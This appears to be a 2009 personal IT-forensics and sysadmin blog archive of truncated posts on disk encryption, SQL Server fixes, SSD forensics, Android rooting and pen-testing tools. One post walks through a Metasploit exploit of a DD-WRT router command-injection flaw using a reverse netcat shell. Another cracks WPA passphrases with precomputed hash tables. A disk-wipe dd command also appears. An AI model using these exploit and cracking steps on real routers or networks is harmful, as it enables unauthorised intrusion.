Showing posts from 2009

Dual Boot Windows XP and BackTrack with Encryption

A number of people have asked me how I am dual booting Windows XP and BackTrack and have both operating systems installed on a fully encrypted partitions. The follow is a rough guide to setting it up. It may not be the best way of setting up this type of configuration but if works for my needs. Your experiences may vary. My laptop has a 200GB IDE hard drive in it. Please adjust for your spec.

Before starting you may want to wipe your entire hard drive.
dd if=/dev/urandom of=/dev/hda Windows XP encrypted with TrueCrypt 6.3
BackTrack /boot partition (not encrypted)
BackTrack / partition encrypted

Install Windows XP first (200GB)

Boot off BackTrack4 cd.fdisk /dev/hdacreate a /boot partition (hda2) 200MBcreate a / partition (hda3) remainder of disk. Setup the encrypted partition.

modprobe aes-i586cryptsetup luksFormat /dev/hdacryptsetup luksOpen /dev/hda3
rootmkfs.ext3 –j –O extent /dev/mapper/root
Run the BT installer and select /dev/mapper/root to be mounted as / and /dev/hda2 as /boot. Make su…

Dell R900 SQL Server 2005 Fails To Install

As part of a new platform deployment I recently took delivery of a number of servers one of which was a DELL R900 with 4x 6 core processors. After a base install of Windows Server 2003 R2 x64 I attempted to install SQL Server 2005 Enterprise. Setup failed with the following error: The SQL Server service failed to start. For more information , see the SQL Books Online....

Microsoft has confirmed that on a computer that has a multicore processor, if the ratio of logical processors to physical sockets is not a power of 2, you cannot install SQL Server 2005. Microsoft SQL Server 2005 Service Pack 2 and higher fixes this. However it it not possible to slipstream a service pack into SQL 2005 install cd / dvd. A quick fix is to modify the boot.ini file and add /NUMPROC=1 to the boot options.

Install SQL Server 2005.
Install SQL Server 2005 Service Pack 3
Remove the /NUMPROC=1 from boot.ini and reboot.
SQL will now see all processors.

SSD Drives and IT Forensics - Update

In previous post The implication of new firmware released for OCZ SSD on computer forensics I asked a number of questions. The post was also send to an internal mailing list where I work. A number of responses came back and I thought I'd share them

1. What are the implications of having this included in the firmware of SSD drives and how would you acquire such a drive?

The implications are wide ranging, but essentially the volume of recoverable data may be reduced. (Forensic analysis of deleted items, system artefacts, etc may not be possible). However, acquisition methods will not be affected.

2. Does the firmware start clearing sectors when it is simply to a power supply or does it require other hardware to be attached?

3. If it starts clearing sectors when connected to a power supply what legal implication will this have if during the acquisition of the drive potential evidence is been deleted by the built-in firmware before if can be forensically acquired ?

No, the firmware does …

The implication of new firmware released for OCZ SSD on computer forensics

UPDATE - Questions answered

On my daily trawl through various feeds, thanks Google Reader for making this so easy, I came across an article that discussed the "benefits" of this new firmware. While I tend to agree with the write from a performance standpoint the IT Forensics voice in my head was saying this could make my job more interesting.

This firmware is designed to keep the speed of the SSD drive as close as possible to that of a new drive even if the drive has been used over a long period of time . The flash memory used on the SSD drive is comprised of cells that usually contain 4KB pages that are arranged in blocks of 512KB. When a cell is unused, data can be written to it relatively quickly. But if a cell already contains some data, no matter how little even if it fills only a single page in the block,the entire block must be re-written.

This is because a memory cell has to be empty to have data written on it, even if it's only partially filled. The data already co…

Root on HTC Magic


1 Click Android Rooting ...

I recently got a HTC Magic on Vodafone UK and decided that it was about time I got root on it.

Murphy's law states that anything that can go wrong will go wrong. Step 1 is always make sure you have a backup.

I downloaded the files from The Unlockr's Guide to getting root on HTC Magic. Since my phone is a Vodafone UK version I downloaded the 32B files.

After extracting the SDK to C:\AndroidSDK\ and the images to C:\AdnroidSDK\tools

I booted my phone into fastboot mode: Power on phone with the "Back" arrow held down.
Connect the usb cable, open a command prompt and and run the following from your AndroidSDK\tools folder:

fastboot boot recovery-new.img

Your phone will reboot and you will be presented by the Android System Recovery Menu.
Choose the "Nandroid Backup 2.1" option. After 2-5 minutes backups of your phones system,boot,recovery,data,…

Slipstream or integrate Office 2007 Service Pack 2 (SP2)

If like me you update and deploy software to new workstation on a regular basis you will quickly grow tired of installing MS Office and then installing the latest service pack. This quick guide will assist in slipstreaming the latest service pack (SP2) into MS Office 2007. I will assume that you will be installing office from a network share and have already copied the entire contents of the CD to this folder.

Download the standalone installer office2007sp2-kb953195-fullfile-en-us.exe to a temporary folder (c:\tmp)
Create folder called Updates (C:\Updates)
Open a command line window (CMD) and type the following on one line:

c:\updates\office2007sp2-kb953195-fullfile-en-us.exe /extract:C:\Updates

Agree to the EULA and then close the Installer when completed.
Move the contents of the C:\Updates folder to the Updates folder in your Office 2007 install folder structure.

Enabling AHCI after installing Windows XP x64

Download the OS Pre-Install sata drivers and extract to a temporery location on the machine (c:\tmp).

Open Device Manager
under IDE ATA/ATAPI controllers you should see something like : Intel ICH9 Serial ATA Storage Controller.
Right-Click on that and select Update Driver
Say no to connecting to Windows Update to search, hit Next
Select Install from a list or specific location (Advanced), hit Next
Select "Don't search. I will choose the driver to install", hit Next
Select Have Disk
Browse to the Driver folder (c:\tmp\) and highlight the iastor.inf file, hit Open Select OK

Now you should have a list of controllers ICH9 /AHCI driver
You'll get warned that installing the device driver is not recommended, click Yes to continue installing
Click Finish
If you have more than one Intel ICH9 Serial ATA Storage Controller you will need to do this for each before restarting
When system boots enter the bios, navigate to the SATA Operation option or equivlant and set it to AHCI
Verify your sat…

Expoliting the cgi-bin vulnerability in dd-wrt

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST
msf exploit(ddwrt_cgibin_exec) > set LHOST
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with enco…

DD-WRT httpd vulnerability

As reported at there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.

Note: The exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As immediate action please disable the remote Web GUI management. But that limitation could be easily overridden by a Cross-Site Request Forgery (CSFR) where a malicious website could inject the exploit from inside the browser.

They guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download the these files from here until we did update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned abo…

Disable System Beep In VMWare

Is the system beep in vmware hurting your ears when linux or FreeBSD machines are reboot.
Add the following line to the .vmx file for that vmware machine.

mks.noBeep = "TRUE"

Forensics and Disk Encryption

The challenges for the computer forensics investigator have increased over the past few years.
Companies are deploying disk and volume based encryption systems.The traditional method of “pull the plug” then forensically image the hard drive is changing Before powering down a computer, consider the potential of encryption software being installed on the computer or as part of the operating system. If present, appropriate forensic methods should be utilised to capture the encrypted data before the computer is powered down.

There are essentially two competing solutions Gather the “best” evidence availableAllow the system to continue operation in an unhindered manner With encrypted drives becoming more common in the corporate environment this means that without the cooperation of the suspect or a master key / password supplied by the IT department the data essentially unreadable. Under APCO guidelines (Good Practice Guide for Computer based Electronic Evidence V.3) there are no guidelines for t…

Backtrack 4 Beta and Nessus 4.0.0

I recently installed Nessus 4.0.0 on a vmware install of BackTrack 4 Beta. Below are the steps I took.

Download the following linux packages from the nessus website.


You will also need to register in order to obtain the activation key.

Before installing we will need to install some missing dependencies

apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant

Install the server.

# dpkg -i Nessus-4.0.0-ubuntu804_i386.deb

Configure the certificate

# /opt/nessus/sbin/nessus-mkcert

Add the admin user

# /opt/nessus/sbin/nessus-adduser

# /opt/nessus/bin/nessus-fetch --register 'your_registration_key'

# dpkg -i NessusClient-4.0.0-ubuntu804_i386.deb

# /etc/init.d/nessusd start

And start the client from the Menu>Intenet>NessusClient or use the CLI

Social Engineering Investigations

Below is a general outline for investigating social engineering style attacks. This article is meant for discussion purposes only.

One thing you need to be aware of is that social engineering is not just limited to IT systems it is an issue for the entire organisation.

Social engineering attacks can vary from low tech to high tech.

There are many factors that can lead to a successful social engineering attack.

Normally an attacker would first take a look at the company website as these are normally filled with lots of useful information, such as the names, positions and phone numbers of staff.

Organisations need to be aware of just how much information they are giving away on their websites.

Its also common practice in organisations that a users email address will be the same as their network user name. The password for email may also be the same as the network logon, this is normally true in situations where a organisation is using Microsoft Exchange.

Armed with this information an attacker…

EnCase and Tableau Forensic Bay

Came across this issue today and though I'd share it with you.

I recently installed the latest version of EnCase Version Reading the release notes states that hard drives connected to Tableau Write Blockers are now recognized by EnCase as been write blocked. Since we use a large number of Tableau devices I started testing.

In testing I have found this to be true for the Tableau T35es, T35e, T3u , T4, T14 and the T15.

When testing with the T335 (Forensic Drive Bay Controller Firmware 6.22) I found the that EnCase is not correctly identifying a drive as been write blocked.

Test Results

IDE - Set to Read Only
SATA1 - Set to Read Only
SATA2 - Set to Read Only

EnCase see's all drives as Write Blocked

IDE - Set to Read Write
SATA1 - Set to Read Write
SATA2 - Set to Read Write

EnCase see's all drives as not Write Blocked

IDE - Set to Read Only
SATA1 - Set to Read Write
SATA2 - Set to Read Only

EnCase see's all drives as Write Blocked.

This can be an issue because if you b…

Install OpenOffice 3.01 in Backtrack 4 Beta

I decided to install OpenOffice in Backtrack since it is not part of the default pack because of size limitations. I always find it useful to have a spreadsheet application installed as part of my Pen-Testing toolkit.
Get the Linux DEB. I am using the English (US)

tar -zxvf OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz
cd OOo_inst_folder/DEBS
dpkg -i *.deb

(Not sure this is needed for KDE but I did it for the icons in kmenuedit)
cd desktop-integration
dpkg -i *.deb

Add it to KDE if you are using Gnome you don't need to do this.

Click on Utilities
Ctrl+N (New)

Name: OpenOffice3 (or what ever you want)
Command: /opt/openoffice.org3/program/soffice
Click on the blank icon next to name and pick an icon for open office
Ctrl+S (Save)

Increase the number of tcp connections in Windows XP


Half-open limit fix is a programdesignedto change the maximum number of concurrent half-open outbound TCP connections (connection attempts) in the Windows system file tcpip.sys. Microsoft first introduced this limit in Windows XP SP2 (Service Pack 2) and is present in all later versions of Windows. This was done to try to slow the spreading of viruses and malware from system to system and also to reduce the impact of infected systems participating in DoS (Denial of Service) attacks. This limit makes it impossible for Windows systems to have more than 10 concurrent half-open outbound connections. After 10, new connection attempts are put in a queue and forced to wait.

FreeNAS - Transmission and Windows Remote Client

I've been playing around with FreeNAS for some time now and have migrated an old Debian server over to FreeNAS in order to make things easier for the non-linux members of our team.

The server hosts all the deployment images for our lab workstations amoung other non-sensitive data. The images are deployed via pxe. more on that to follow in another post.

I recently looked at the BitTorrent service which seems like a good idea. All your torrents are controlled and downloaded to centeral location. Ideal in a lab environment. Downloading the latest version of Ubuntu or OpenOffice is now as simple as dropping the .torrent file in to shared directory and letting FreeNAS take care of the rest.

The majority of the lab workstations are Windows box's so I went to the Transmission website to download the Windows remote client. It was then that I found that Transmission do not have a Windows client.

A few google minutes later I find transmission-remote-dotnet on the google code page. I instal…

VMWare Shared Folders and BackTrack 4 Beta

I finally got around to trying out the latest version of Backtrack 4 Beta. Using VMWare Workstation 6.5.1 I enabled "Shared Folders" so I could use some pre-complied tables. However when I browsed to /mnt/hgfs I see a blank folder.
Trying mount.hgfs .host:/ /mnt/hgfs/ gave the following error. Error: cannot mount filesystem: No such device

To fix this issue follow these steps.

Download and extract the latest tarball of open-vm-tools from sourceforge.

Download and extract the latest glib tarball from because open-vm-tools require it

Install glib
./configure && make && make install

Satisfy dependencies of open-vm-tools.
./configure --without-dnet --without-x --without-unity --without-icu && make && make install

Reboot and use the following command to mount your VMWare Shared Folder.

mount -t vmhgfs .host:/ /mnt/hgfs/

Add Pre-Computed WPA hashes to airolib

First I obtained the 33GB rainbow table from

Please note that the 33 GB file is compressed using a number of methods so you need a lot of space to decompress the hash files.

When file is downloaded (wpa_psk-h1kari_renderman.tar.lzma) extract the file, I used 7zip.
Once extracted you are left with wpa_psk-h1kari_renderman.tar

Next step is to decompress the .tar, I used 7zip.
When the extraction is complete you will have 9 folders these folders contain the pre-compiled Hashes.

Now all you have to do is know what essid you are looking for I assume you are Auditing your OWN NETWORK or have permission to audit your clients network.


I want to audit a wireless network with WPA encryption with an essid of "Private"

airolib-ng testdb --import cowpatty /mnt/sdb1/wpapsk/xag-0/Private

There will then be some reading and writing to "testdb"

airolib-ng testdb --stats

you should see your essid computed to 100%

Creating Encrypted Forensic Images

Recently we have been as by some of our clients to encrypt the forensic images we have collected before leaving their site. Below are two possible solutions to this.

Hardware Capture Method

Using a solo or talon create a standard dd image of the suspect hard drive.
As the drive is being imaged, using a forensic laptop, create a TrueCrypt volume on a new ntfs formatted hard drive. Make sure that the TrueCrypt volume size is large that the disk that is being imaged.

When the solo or talon has finished imaging robocopy the dd image to the mounted TrueCrypt volume.

Verify the the image can be opened without any errors.
Securely erase the images from the non encrypted drives using your local standard method.

Software Capture Method

Create a TrueCrypt encrypted hard drive formatted as NTFS.
This can be done in advance as it will take some time to format and encrypt a 500GB hard drive

Using FTK, EnCase, DD, etc.

Mount the TrueCrypt encrypted drive.
Connect the suspect drive to a write blocker.
Create a i…

Recover Deleted Outlook Items

Open the PST in the Hex editor.

Delete positions 7 through 13 with the spacebar.
Since you're using hexadecimal numbering, this actually clears 13 characters in the following positions:
00007, 00008, 00009, 0000a, 0000b, 0000c, 0000d, 0000e, 0000f, 00010, 00011, 00012, 00013
As you clear the characters, the editor displays the code “20” in their position.

Save the PST, it is now corrupted.

Run the Inbox Repair Tool, SCANPST.exe, to recover the file.

On Win2K and WinNT systems, the executable is located in
C:\Program Files\Common Files\System\Mapi\1033\NT

You can also find it on the Office 2000 CD-ROM in
\Program Files\Common\System\Mapi\1033\NT.

On Windows XP, the file is located in
C:\Program Files\Common Files\System\Mapi\1033

And Windows XP Office XP/2002 SP2
C:\Program Files\Common Files\System\MSMAPI\1033

The Inbox Repair Tool creates a backup and repairs the damage and recreates the PST.

Open the new PST in Outlook.

The Deleted Items folder should now contain the deleted messages, unles…